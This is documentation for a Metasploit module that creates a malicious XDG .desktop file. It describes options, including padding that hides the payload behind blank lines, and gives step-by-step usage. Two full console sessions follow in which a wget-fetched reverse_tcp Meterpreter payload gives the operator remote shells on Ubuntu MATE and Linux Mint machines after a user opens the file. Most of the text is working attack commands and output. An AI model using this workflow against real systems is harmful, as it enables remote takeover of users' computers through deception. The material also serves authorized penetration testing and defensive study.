Xdg Desktop - Metasploit Framework

Vulnerable Application

This module creates a malicious XDG Desktop (.desktop) file.

On most modern systems, desktop files are not trusted by default. The user will receive a warning prompt that the file is not trusted when running the file, but may choose to run the file anyway.

The default file manager applications in some desktop environments may impose more strict execution requirements by prompting the user to set the file as executable and/or marking the file as trusted before the file can be executed.

Options

FILENAME

The desktop file name. (Default: msf.desktop)

APPLICATION_NAME

The application name. Some file managers will display this name instead of the file name. (Default: random)

Advanced Options

PrependNewLines

Prepend new lines before the payload. (Default: 100)

Verification Steps

On the Metasploit host:

Start msfconsole
Do: use exploit/multi/fileformat/xdg_desktop
Do: set filename [filename.desktop]
Do: set payload [payload]
Do: set lhost [lhost]
Do: set lport [lport]
Do: run
Do: handler -p [payload] -P [lport] -H [lhost]

On the target machine:

Open the msf.desktop file
If prompted, choose "Launch Anyway"

Scenarios

Ubuntu MATE 24.04.2 (x86_64)

msf > use exploit/multi/fileformat/xdg_desktop
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.200.130:4444 
msf exploit(multi/fileformat/xdg_desktop) > 
[*] Sending stage (3090404 bytes) to 192.168.200.193
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400

msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : linuxmint-mate-24-04.2-desktop-amd64
OS           : Ubuntu 24.04 (Linux 6.14.0-24-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Linux Mint 22.1 (MATE) (x86_64)

msf > use exploit/multi/fileformat/xdg_desktop 
[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
lport => 4444
msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
FETCH_COMMAND => WGET
msf exploit(multi/fileformat/xdg_desktop) > run
[+] msf.desktop stored at /root/.msf4/local/msf.desktop
msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 192.168.200.130:4444 
msf exploit(multi/fileformat/xdg_desktop) > 
[*] Sending stage (3090404 bytes) to 192.168.200.189
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400

msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.200.189
OS           : LinuxMint 22.1 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >